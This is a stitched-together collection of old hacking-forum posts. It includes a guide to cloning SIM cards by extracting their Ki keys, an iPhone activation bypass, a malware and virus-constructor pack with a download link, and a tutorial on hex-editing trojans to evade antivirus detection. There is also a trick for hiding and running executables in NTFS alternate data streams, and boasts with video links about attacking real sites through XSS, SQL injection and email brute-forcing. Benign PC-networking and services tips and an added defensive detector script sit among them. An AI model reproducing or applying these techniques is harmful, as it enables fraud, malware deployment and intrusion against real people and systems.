1. ::Getting IMSI,ICCID & Ki number from your SIMs::

Step 1 - Your(V1)SIM

1. Put your carrier SIM card in programer
2. Run Woronscan
3. Click on "Tasks" tab then on "IMSI select" u will get a IMSI number, write it down.
4. Click on "Task" tab then on "ICC select" u will get a ICCID number, write it down.
5. Click on "Tasks" tab then on "Ki search", in pop-up window just click "Search", and wait, Ki extraction has begun. (I was waiting for mine 40 min ) When u get it, write it down.

Step 2 - Getting IMSI from AT&T SIM card which came with an iPhone

1. Put your AT&T SIM card in programer
2. Click on "Tasks" then on "IMSI select" u will get a IMSI number, write it down.
3. Close Woronscan
4. Remove SIM from programer

Now U have all "data" to make SuperSim.


2. ::Making SuperSim::

1. Download & extract - http://www.rapid_share.com/files/474..._iphone_u1.rar(Remove dash "-")
1.a Put your Silvercard in programer
2. Run Sim-Emu 6.01 Configurator v2.1
3. Click on Configure tab
4. Click "Read from disk" button
5. Browse to your downloaded Flash&EEPROM files, first double click on SIM_EMU_6.01_iphone_u1.HEX and then double click on SIM_EMU_6.01_iphone_u1_EP.HEX, now they are loaded,positions 0 and 9 are red colored,thats fine.

6. In position 0 , type in data which u got from your carrier SIM with Woronscan - IMSI,Ki & ICCID!
For ADN/SMS/FDN# type 161, 15, 4, for SMS Centre type in your carrier SMS center number. Type in
some numbers for PIN1 and PUK1, remember it.

7. Now select position "9", here type IMSI from AT&T SIM card ,and PIN1 ,PUK1 number same like in position "0" ,NOTHING ELSE!

8. In "Config mode" tick "Files" circle button.

9. Click on "Write to disk" button,u'll be asked to save new created SuperSim Flash&Eeprom files,Save it!

10. Write those NEW created Flash&Eeprom files on Silvercard with your programer software!

11. How to cut big card to SIM - http://www.mobileshop.org/usertech/simcutting.htm

12. Put your SuperSIM in iPhone and connect it with USB to PC


3. ::Making your iPhone work with SuperSim::

1. Jailbreak your iPhone (search the forum for "How To" for your iPhone version)

2. Download - http://rapid_share.com/files/74205465/SuperSim.rar ,unrar folder from inside to Desktop

3. Go to - https://ookoo.org/iphone/iasign.php ,under Activator v0.2 type in DEVICE ID, IMEI ,ICCID. Click "Generate"

If u're on WIN click on "download a custom activator v0.2" to download *.exe , now move it to SuperSim folder.

If u're on MAC click on download your generated activation record to download *.plist file TO DESKTOP. (after download RENAME IT TO a.plist !!!!!!)


:: Activation ::

WINDOWS

While your iPhone is still connected to PC double click iphoneinterface.exe in SuperSim folder, now type one command at a time:

cd /System/Library/Lockdown/

putfile /System/Library/Lockdown/iPhoneActivation.pem

exit

Now double click that long digit exe file u downloaded in step 3. to activate your iPhone with SuperSim!



MAC

1.)Copy iPhoneActivation.pem from SuperSim folder to /System/Library/Lockdown/ ,with your favorite tool

2.) Download the following file to your Mac.
http://anderson-technologies.com/wp-...iphonetool.zip

3.) Extract it to a directory on your desktop named iPhoneTool , AND COPY YOUR DOWNLOADED a.plist file OVER that one already inside!

4.) Open the program “Terminal” location in HardDrive/Applications/Utilities

5.) Type the following command into the flashing cursor:

cd ~/Desktop/iPhoneTool

6.) Now make sure your iPhone is connected and you quit iTunes

7.) To activate your iPhone type the following command into the flashing cursor
(note that there are two dashes before activate):

./tool --activate a.plist

No Worries if your or others nokia phone is locked.
Here's the code resetter.

You just need the IMEI no: of your phone & a software.

To know IMEI no: type *#06# & you will see a 15 digit code.

To get code resetter manually paste the below link in the address bar of your
browser.



http://rapidshare.com/files/106920865/NokiSecCodeResetter.rar

This book was written by me. Sorry, I wrote this e-book in my language (Azerbaijani).
In this book i illustrate how to find it on sites and how to exploit it.
You can download this e-book from=>

Download Now_cLICK_Here

Dont open on your own computer LOL
W32.Bagle.AF
W32.Bagle.H
W32.Hiton.A
W32.MyDoom.F
W32.Netsky.Z
W32.Netsky.D
W32.Netsky.B
W32.Sober.F
W32.Sober.D
W32.Sober.C
W32.Sober
W32.Dumaru
W32.Sobig.F
W32.BugBear.B
W32.LovSan/Blaster1
W32.Sinapps
W32.Sunday
W32.Delta
W32.Gold
W32.Retro
W32.Koshi.1.9
Linux.ADM
Linux.Coco
W32.NBC
W32.Clickit
W32.Parasit
W32.PolySnakebyte
W32.RousSarcoma
W32.Hllw.Sydney@MM
CIH
I Love You
Melissa
w32nimda
Wagner 782
Casino
Harddrive-killer pro 5
Code red 1
Code red 2
Pokemon Pikachu
AIDS
hdfill
Blackday
Bulbasaur
Mirc.El_Che_is_alive
Kpmv.W2000.Poly
Mbop!
C-worm
Batschell
bat.antifa
Bat/BatXP.Iaafe
Bat\\bun
Bat.Bush
BAT.Dolomite.worm
bat.****
bat/hotcakes
bat.ina
bat.junkboat
bat.soulcontrol
BatXP.Saturn
BAT/Calvin&Hobbes
claytron
HoloCaust
p2p.Opax
PERL.Nirvana
VBS/Artillery
vbs.eva
VBS/Evade
Vbs.Evion
w32.merkur.c
W32/Outsider
W32/Outsider B
W32/Outsider C
W32/Outsider D
W32/Outsider E
W32/Perrun
W97/Blackout
W97M/Authority
W97M/Chester
W97M/SFC
WinREG.Sptohell
Virenpaket 0
Virenpaket 1
Virenpaket 2
Virenpaket 3
Virenpaket 4
Virenpaket 5
Virenpaket 6
Virenpaket 7
Virenpaket 8
Virenpaket 9
Virenpaket 10
Virenpaket 11
Zed\'s Word Macro Virus Constructor
Windows Scripting Host Worm Constructor 1.0
Special Format Generator 2.0


http://uploaded.to/?id=l9eab8


There are quite a few services you can disable from starting automatically.
This would be to speed up your boot time and free resources.
They are only suggestions so I suggest you read the description of each one when you run Services
and that you turn them off one at a time.

Some possibilities are:
• Alerter - Sends alert messages to specified users that are connected to the server computer.
• Application Management - Allows software to tap directly into the Add/Remove Programs feature via the Windows Installer technology.
• Background Intelligent Transfer Service - The Background Intelligent Transfer service is used by programs (such as Windows AutoUpdate) to download files by using spare bandwidth.
• Clipbook - ClipBook permits you to cut and paste text and graphics over the network.
• Error Reporting Service - Allows applications to send error reports to Microsoft in the event of an application fault.
• Fast User Switching - Windows XP allows users to switch quickly between accounts, without requiring them to log off.
• Help and Support - Allows the XP Built-in Help and Support Center to run.
• IMAPI CD-Burning COM Service - You don't need this if you have other software to create CDs.
• Indexing Service - Indexes contents and properties of files on local and remote computers; provides rapid access to files through flexible querying language.
• IP SEC - Manages IP security policy and starts the ISAKMP/Oakley (IKE) and the IP security driver. If you are not on a domain, you likely don't need this running.
• Messenger - Transmits net send and Alerter service messages between clients and servers. This is how a lot of pop-up windows start appearing on your desktop.
• Net Logon - Supports pass-through authentication of account logon events for computers in a domain. If you are not on a domain, you don't need this running
• Network DDE - Provides network transport and security for Dynamic Data Exchange (DDE) for programs running on the same computer or on different computers.
• NT LM Security Support Provider - Provides security to remote procedure call (RPC) programs that use transports other than named pipes.
• Performance Logs and Alerts - Collects performance data from local or remote computers based on preconfigured schedule parameters, then writes the data to a log or triggers an alert. If you don't need to monitor your performance logs, then you don't need this service.
• Portable Media Serial Number - Retrieves the serial number of any portable music player connected to your computer
• QOS RSVP - Provides network signaling and local traffic control setup functionality for QoS-aware programs and control applets.
• Remote Desktop Help Session Manager - Manages and controls Remote Assistance. If you are not using Remote Desktop you don't need this service.
• Remote Registry - Enables remote users to modify registry settings on this computer.
• Routing & Remote Access - Offers routing services to businesses in local area and wide area network environments. Allows dial-in access.
• Secondary Login - Enables starting processes under alternate credentials. This is what allows you to run an application as another user.
• Smart Card - Manages access to smart cards read by this computer.
• Smart Card Helper - Enables support for legacy non-plug and play smart-card readers used by this computer.
• SSDP Discovery Service - Enables discovery of UPnP devices on your home network.
• TCP/IP NetBIOS Helper - Enables support for NetBIOS over TCP/IP (NetBT) service and NetBIOS name resolution. This should not be needed in today's network environment.
• Telnet - Enables a remote user to log on to this computer and run programs, and supports various TCP/IP Telnet clients.
• Uninterruptible Power Supply Service - Manages an uninterruptible power supply (UPS) connected to the computer.
• Universal Plug and Play Device Host - Provides support to host Universal Plug and Play devices
• Upload Manager - Manages synchronous and asynchronous file transfers between clients and servers on the network.
• Volume Shadow Copy Service - Manages and implements Volume Shadow Copies used for backup and other purposes.
• Web Client - Enables Windows-based programs to create, access, and modify non-local files across the Internet.
• Wireless Zero Configuration - Provides automatic configuration for the 802.11 adapters
• WMI Performance Adapter - Provides performance library information from WMI HiPerf providers.

Hello people. Since I had many people asking me how to hexedit, I decided to write
this little tutorial. I will try to explain how to hexedit your favourite Trojan in order to
make it undetected by certain antivirus programs. I will try to put this as simple as
possible so everyone understands it.
Content:
1. General info about hexediting .
2. What tools you need to get started.
3. How to hex.
-step 1
-step 2
__________________________________________________ ___________________
1. General info about hexediting?
If you want to make your server undetectable, you need to know how AVs work and
how they detect your files, right? There are a few ways that AVs use to detect your
server: heuristics, sandboxing, etc., and one of them is using so called "definition files"
that carry information about strings inside your server. Well, that's the way we're
going again in this tutorial because hexing is pretty much useless for other methods of
detection. So when AVs scan your files it searches for specific strings on specific parts
in your server, and if strings match with strings in the AV database, your file is
detected.
Let's say that detected strings are "XX" so we need to change that string to something
else (e.g. "XY","YY") that isn't in the AV definition database so the file can't be
matched with any of the AV definitions and that way the file will be undetectable.
There are going to be a few tagged strings in your server - not only one, depending on
what trojan you're using and how popular is. Less popular trojans tend to have less
tagged parts, and with that they are easier to make it undetectable.
First of all, hexing is not the best method for undetecting files because AVs can
change old tagged parts, and once your AV is updated, new definition files are
downloaded and your once undetected server might become detected again. Also not
all AVs use the same tagged parts - this way you need to hex your server against more
AVs to make it fully undetected. This can be annoying because you need to download
wanted AVs then hex it your server, then download another etc., etc. Sometimes AVs
tag critical parts of the server, and if that part is altered will corrupt the server. Also,
heavily edited servers can become unstable, some functions might not work, or even
you can corrupt your server and make it useless.
That's why you need to check your server if it's still working after every single
change you made while hexing it.
Now how to find detected strings in your server?
There are few ways you can do this: Manually cut your server in half adding 00's to
one half and scanning it until you find the detected string (which is slow and time
consuming); use file splitters like UKSplitter that are going to split your server into
bytes, and after that scan all split files and find out what byte is detected then alter it
in original exe, or you can use an offset finder like AV Devil.
2. What tools we need.
- Unpacked trojan server.
(your favorite trojan server)
- Hex editor.
(I will use Hex WorkShop, you can find it at http://www.hexworkshop.com/)
- Offset finder
(AVDevil, you can find it at www.trojanfrance.com)
3. How to hex:
-Step 1.
Turn your AV real-time protection "OFF". Make your Trojan server and
make sure that is not packed.
Open AV Devil and select your server. After selecting, the server msg will pop up
click OK, and the next msg will popup asking you to turn your AV real-time
protection back "ON". After you do that just click "OK" and lets AV Devil
search for detected offsets.
During the search your AV will pop up a couple of times. Just click on "Skip" and let
AV Devil finish.
After its done you will see something like this:



As you can see this Trojan server has only two detected offsets.
That means that first detected offset begins at 53F7 and ends at 5476.
Also you can see where the second offset starts and ends. That's the part that the AV
is checking in this definition database. If the part in the server matches with part in
AV database your server is detected. You can hex beginning and ending offset or in
between.
Step 2.
Now when we have detected offsets, we open our server in Hex WorkShop. Type
"Ctrl+G" and this will come up:



Type the first offset in, select from "Beginning of File," and make sure that you
selected "hex," because offsets in AV Devil are displayed in that manner. Unless you
save via AV Devil, then they are converted into a decimal. Click "Go" and you will
be sent to that offset location. Now we need to change that "31" to something else, so
we will change it to "32".



Select "31" right click to it and select fill.



You will see the window below. In "Fill with the following hex byte" we are going to
fill in "32" and hit OK.



After clicking "OK," the changed hex byte going to be shown in red.

__________________________________________________ __________________
Now repeat this for every offset that you found in AV Devil.


__________________________________________________ ___________________
Going to change it "FE" to "EE" and so on for all other detected offsets.



Once you've completed editing all offsets, save your server and scan if it's UD, and
then you're done. If the AV still detecting it, repeat steps 1 and 2.
Here's a little tip on how to change detected bytes: Try to make minor changes like
32 =>31, 22, 42, 33, 34, or FE =>EE ,FF etc., etc. Basically, one character up/down
for each - that's the best way and will minimize chances to corrupt your server. If that
doesn't work for some reason, you can try and change it to something completely
different, but always check your server after editing bytes. That way you can see if the
server works or if it's corrupted (you can keep track of what change caused the
corruption and you can try and edit that byte with some other character).
Another thing in some Trojans servers is that AV Devil can't find the beginning of the
first offset and will mark it with "0." Let's say you've hexed all other found offsets
but your server is still detected. Split the file into half and run AV Devil on the first
half. That way you will be able to find the first offset that is missing and finish your
hexing. If some tagged part is a letter, e.g. "Y" change it to "y" or just PlAy wItH
ThE CaPs.
Ex:



So there you have it! Now you know how to hex your server and make it undetected
from wanted AVs.
(I TAKE NO CREDIT FOR THIS TUTORIAL JUST POSTING!)



This Video about how i infect one armenian **** site with buffer overflow exploit and with javascript doser..
NOTE:This site hacked by my friend but i infect it for **** this site forever:))
If You Known How i infect this site see video:

Click Here For Download Video....

In This Video i find XSS in armenian site and i manipulate with this..
XSS very dangerous aspect in security..
For download Click in here:
Download_Now_

It`s 4 fun:)) How to inject *.chm file with dos code and how to exploit this.Really for enjoy:)
Download video
http://rapidshare.com/files/101605701/inject_with_dos_code.rar.html

Hmm......In this video i illustrate how to i verify one armenian site to sql injection vulnerable and then i exploited this site.In result i have hash and e-mail account of admin..
You can download this video from:
http://rapidshare.com/files/100361473/kkobi4.rar.html

How to crack MD5 algorithmic hash?It`s simple.In this video i illustrate this with
MDcrack-sse.exe(it`s command line tool)
Video and program included in archive..
http://rapidshare.com/files/108863477/hash_cracking_md5Collision.rar.html

Manual Unpacking of aspack 2.12 packer
http://rapidshare.com/files/102329720/Aspack_2.12_Al.y.rar.html

Manual_Unpacking_of _MEW 11 1.2 -> NorthFox/HCC packer
http://rapidshare.com/files/100845900/handle_mew.rar.html

In this video i illustrate how to remotely bruteforce e-mail account on rambler.ru
http://rapidshare.com/files/98326940/bruteforce.rar.html

In This Video I illustrate how to hunt keylogger which configured delivery logs with ftp..
For download video=>http://ifolder.ru/5540890
pass for download hexed

Firstly, thanks for inviting me! And I want to say I don't know English very well. Oops:
In this post I write about a steganography method for hiding your data.
For example, if you want to hide your data (*.txt data) in a *.scr file without losing quality of the *.scr, or in another type of file (it's analogous):
I wrote this batch script:
@REM CODED BY aka.step
cls
echo off
chdir %homedrive%\stenografik
cd %homedrive%\stenografik\image\
type %homedrive%\stenografik\image\1.scr>>10.txt
cd %homedrive%\stenografik\image
copy /B %homedrive%\stenografik\image\10.txt + %homedrive%\stenografik\src\1.scr %homedrive%\stenografik\src\2.txt
cd ../
copy /B %homedrive%\stenografik\src\2.txt + %homedrive%\stenografik\image\1.scr %homedrive%\stenografik\lib\step_by.scr
del /Q %homedrive%\stenografik\src\2.txt
del /Q %homedrive%\stenografik\image\10.txt
cls
start %homedrive%\stenografik\lib
exit
============That's all. Your *.txt is hidden in your screensaver or in another file type:))
If you want to open the steganography file and see your confidential data, open with Notepad the file placed in
%homedrive%\stenografik\lib\step_by.scr <<==In this file you have the confidential data (step_by.scr)
It's a very simple method but it's very powerful too.
With this method you can hide *.txt in (*.mp3, *.avi, *.jpg, *.gif, etc.)
Aka.Step
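
How a defender spots data concatenated onto a carrier file as in the post above, as an added example that is not part of the original post: it walks the container structure to its logical end and reports any bytes that follow. It assumes a JPEG or GIF carrier (two of the types the post lists); the function names and sample bytes are made up for this sketch.

```javascript
// Added example: find bytes that sit after the logical end of a JPEG or GIF.
// The sample files are constructed and structurally minimal: they satisfy
// the parsers below but are not renderable images.

// Offset just past the JPEG EOI marker, or -1 if the marker structure is bad.
function jpegEnd(buf) {
  if (buf.length < 4 || buf[0] !== 0xff || buf[1] !== 0xd8) return -1; // SOI
  let p = 2;
  while (p + 1 < buf.length) {
    if (buf[p] !== 0xff) return -1;            // lost marker sync
    const marker = buf[p + 1];
    if (marker === 0xff) { p++; continue; }    // fill byte before a marker
    p += 2;
    if (marker === 0xd9) return p;             // EOI: logical end of the image
    if (marker === 0x01 || (marker >= 0xd0 && marker <= 0xd7)) continue;
    if (p + 2 > buf.length) return -1;
    const len = buf.readUInt16BE(p);           // segment length includes itself
    if (len < 2 || p + len > buf.length) return -1;
    p += len;                                  // also skips embedded thumbnails
    if (marker !== 0xda) continue;
    // After SOS comes entropy-coded data: FF00 is a stuffed byte and
    // FFD0..FFD7 are restart markers, so neither ends the scan.
    while (p + 1 < buf.length) {
      const next = buf[p + 1];
      if (buf[p] === 0xff && next !== 0x00 && !(next >= 0xd0 && next <= 0xd7)) break;
      p++;
    }
  }
  return -1;
}

// Offset just past the GIF trailer byte (0x3B), or -1 if the structure is bad.
function gifEnd(buf) {
  const sig = buf.toString("latin1", 0, 6);
  if (buf.length < 13 || (sig !== "GIF87a" && sig !== "GIF89a")) return -1;
  let p = 13;                                  // header + logical screen descriptor
  if (buf[10] & 0x80) p += 3 * (1 << ((buf[10] & 0x07) + 1)); // global colour table
  const skipSubBlocks = () => {
    while (p < buf.length && buf[p] !== 0) p += 1 + buf[p];
    p++;                                       // zero-length block terminator
  };
  while (p < buf.length) {
    const kind = buf[p++];
    if (kind === 0x3b) return p;               // trailer: logical end of the image
    if (kind === 0x21) { p++; skipSubBlocks(); } // extension: label, then sub-blocks
    else if (kind === 0x2c) {                  // image descriptor
      if (p + 9 > buf.length) return -1;
      const flags = buf[p + 8];
      p += 9;
      if (flags & 0x80) p += 3 * (1 << ((flags & 0x07) + 1)); // local colour table
      p++;                                     // LZW minimum code size
      skipSubBlocks();
    } else return -1;
  }
  return -1;
}

// Trailing bytes are a reason to inspect the file, not proof of hidden data.
function findAppendedData(buf) {
  for (const [type, locateEnd] of [["jpeg", jpegEnd], ["gif", gifEnd]]) {
    const end = locateEnd(buf);
    if (end >= 0) return { type, end, trailing: buf.length - end };
  }
  return { type: null, end: -1, trailing: 0 };
}

// Constructed samples.
const cleanJpeg = Buffer.from([
  0xff, 0xd8,                                  // SOI
  0xff, 0xe0, 0x00, 0x04, 0x4a, 0x46,          // APP0 with a 2-byte payload
  0xff, 0xda, 0x00, 0x02,                      // SOS with an empty header
  0x12, 0xff, 0x00, 0x34, 0xff, 0xd0, 0x56,    // scan data: stuffed FF, RST0
  0xff, 0xd9,                                  // EOI
]);
const cleanGif = Buffer.concat([
  Buffer.from("GIF89a", "latin1"),
  Buffer.from([1, 0, 1, 0, 0x00, 0, 0]),       // 1x1 screen, no global table
  Buffer.from([0x2c, 0, 0, 0, 0, 1, 0, 1, 0, 0x00]), // image descriptor
  Buffer.from([0x02, 0x02, 0x4c, 0x01, 0x00]), // LZW size, one sub-block, end
  Buffer.from([0x3b]),                         // trailer
]);
const hiddenNote = Buffer.from("hidden note", "latin1");

console.log(findAppendedData(cleanJpeg));
console.log(findAppendedData(Buffer.concat([cleanJpeg, hiddenNote])));
console.log(findAppendedData(Buffer.concat([cleanGif, hiddenNote])));
```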

-Taken from my post at http://forums.educationd.info (I am the original author, go check)...

Okay, so why would we want to hide files using alternative data streams? Well, for example, you could hide a .exe file in a text file and send it through gmail or whatever.

So, first things first, we create a new text file. Inside the text file we type "blah blah blah", type whatever you want, it really doesn't matter. Save the text file as "test.txt" (or whatever you want).

Next, copy the .exe (or whatever file you wish to hide) to the same directory in which you saved "test.txt". In this case, my file will be "server.exe".

Now open up your command prompt, and navigate to the directory in which you saved the "test.txt" and enter the following command...

Code:
type server.exe > test.txt:server.exe
"server.exe" should have been successfully hidden in an alternative data stream within "test.txt". (if you open up "test.txt", you'll see that it looks exactly the same, even the file size )

You can now delete the original "server.exe".

To run the hidden "server.exe", open up the command prompt and enter the following...

Code:
start ./test.txt:server.exe
Aaand, that's it!

-Phate

I know a lot of you might read this and say that I'm just copying and pasting, it's true but I am the author so I can post it where I want... I know this is not got to do with hacking or cracking but most of my articles will be educational hope it helps ;)

Okay so why write about it? Well because there was once a time that i needed to know how to connect two computers together and I couldn't find any articles to help me and no links on the internet that had it in detail, so this is for the people that might experience the same.
So let's begin!

Firstly you will need to know how exactly your two PC's are going to connect. So here it is. The computers will connect directly to each other therefore no hub will be needed. For those of you that don't know, a hub is just a device that connects computers in a network via UTP STRAIGHT THROUGH cables.

The reason why I wrote straight through in caps is because this is not what you will be using to connect the two computers. Instead you will be using cross over cables. You can get this from a local computer store for relatively cheap. Or if you feel like doing work then make it, it's really easy. If you need any help, then a Google search on how to make crossover cables will help a lot. The reason why I don't tell you how, because I'm telling you how to connect two computers not create crossovers.

Anyways that's all the requirements you'll need, just a cross over cable. (Please note; if you are buying or making a cross over, make sure it's at least cat5e UTP cables.)
Now that we got that out of the way, let's get to work!

Step1
On each computer, right click on "My Computer". Click Properties and then click on the "Computer Name" tab. Where it says "Computer description:" Give each computer a description (It must not be the same). Now click on the "change" so that you can change the name of the computer and create a workgroup. In the name option give it the same name you gave it for its description and in the workgroup section type in "my first network" (REMEMBER: Names of the computers should NOT be the same, BUT Workgroup names should be EXACT the same on both) Now once you change these, you will be asked to restart the computer, so simply click yes or ok, whatever you are prompted with.

Step 2
After the computers are rebooted you will need to setup IP addresses for each computer. This is how:
On your desktop, look for the icon named "My Network Places". Now double click it to open it.
Once open look on the left to see an option "view network connections" and click on it.
Now right click on local area network and click properties.
Where it says "This connection uses the following items:"; scroll down to "Internet Protocol (TCP/IP)", click on it and click the properties button.
Now click on "Use the following IP address" and at "IP Address" type in an IP address e.g 192.168.0.1.
Although you do the same steps for both computers you must have different IP addresses so you can make the second computers IP address 192.168.0.2
After you set the IP addresses just press the tab button and you should get a number in the subnet mask as 255.255.255.0, then press ok and wait a while and now you are almost done!

Step 3
This is the easiest part; just take your cross over cable and connect to each computers network card RJ45 port. That's it you now will be able to see the computers in "My Network Places". You may start sharing files!